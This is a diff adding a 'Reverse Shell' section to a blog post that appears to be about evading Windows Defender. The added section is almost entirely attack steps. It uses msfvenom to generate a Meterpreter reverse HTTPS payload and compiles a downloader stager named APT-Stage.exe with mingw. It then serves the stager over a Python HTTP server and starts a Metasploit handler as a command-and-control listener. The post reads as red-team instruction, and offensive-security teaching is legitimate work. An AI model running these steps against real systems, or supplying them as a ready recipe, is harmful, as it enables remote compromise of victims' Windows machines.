--- a/_posts/2026-1-30-AV-Ev.md
+++ b/_posts/2026-1-30-AV-Ev.md
@@ -151,3 +151,100 @@ Do you think this time would bypass Windows Defender?
 </div>
 
 This successfully performed a sandbox bypass.
+
+# Reverse Shell
+
+Now, let’s get to the real deal: getting a reverse shell, not just popping up a calculator. This time, we will not use encryption.
+
+<img 
+  src="https://miro.medium.com/v2/resize:fit:2000/format:webp/1*vZGONyKEOQJlA_ApeQKuLw.png"
+  alt="Website initial view"
+  class="zoomable-img"
+  style="border: 2px solid #ccc; border-radius: 10px; cursor: zoom-in;"
+/>
+
+#### Step 1: Generate the Staged Payload
+
+Let's generate the raw C code for a staged payload.
+
+<div class="code-block-container">
+  <span class="code-lang-tag">Terminal</span>
+  <button class="copy-btn" onclick="copyCode(this)" title="Copy code">
+    <svg width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+      <rect x="9" y="9" width="13" height="13" rx="2" ry="2" stroke="currentColor" fill="none"/>
+      <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1" />
+    </svg>
+  </button>
+  {% raw %}
+  <pre><code class="Terminal">
+msfvenom -p windows/meterpreter_reverse_https LHOST=IP LPORT=8443 -f raw > shellcode.bin
+
+</code></pre>
+  {% endraw %}
+</div>
+
+#### Step 2:
+
+<div class="code-block-container">
+  <span class="code-lang-tag">Terminal</span>
+  <button class="copy-btn" onclick="copyCode(this)" title="Copy code">
+    <svg width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+      <rect x="9" y="9" width="13" height="13" rx="2" ry="2" stroke="currentColor" fill="none"/>
+      <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1" />
+    </svg>
+  </button>
+  {% raw %}
+  <pre><code class="Terminal">
+i686-w64-mingw32-gcc https-downloader.c -o APT-Stage.exe -lwininet
+</code></pre>
+  {% endraw %}
+</div>
+
+#### Step 3: Set up the Listener (The "C2 Server")
+
+<div class="code-block-container">
+  <span class="code-lang-tag">Terminal</span>
+  <button class="copy-btn" onclick="copyCode(this)" title="Copy code">
+    <svg width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+      <rect x="9" y="9" width="13" height="13" rx="2" ry="2" stroke="currentColor" fill="none"/>
+      <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1" />
+    </svg>
+  </button>
+  {% raw %}
+  <pre><code class="Terminal">
+sudo python3 -m http.server 80
+</code></pre>
+  {% endraw %}
+</div>
+
+<div class="code-block-container">
+  <span class="code-lang-tag">Terminal</span>
+  <button class="copy-btn" onclick="copyCode(this)" title="Copy code">
+    <svg width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+      <rect x="9" y="9" width="13" height="13" rx="2" ry="2" stroke="currentColor" fill="none"/>
+      <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1" />
+    </svg>
+  </button>
+  {% raw %}
+  <pre><code class="Terminal">
+msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter_reverse_https; set LHOST eth0; set LPORT 8443; run"
+</code></pre>
+  {% endraw %}
+</div>
+
+
+<img 
+  src="https://miro.medium.com/v2/resize:fit:2000/format:webp/1*lKwtpe4lUYhCAHGq9mzRZA.png"
+  alt="Website initial view"
+  class="zoomable-img"
+  style="border: 2px solid #ccc; border-radius: 10px; cursor: zoom-in;"
+/>
+
+<div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;">
+  <iframe 
+    src="https://www.youtube.com/embed/v8enMs1Oexo" 
+    frameborder="0" 
+    allowfullscreen 
+    style="position: absolute; top:0; left: 0; width: 100%; height: 100%;">
+  </iframe>
+</div>
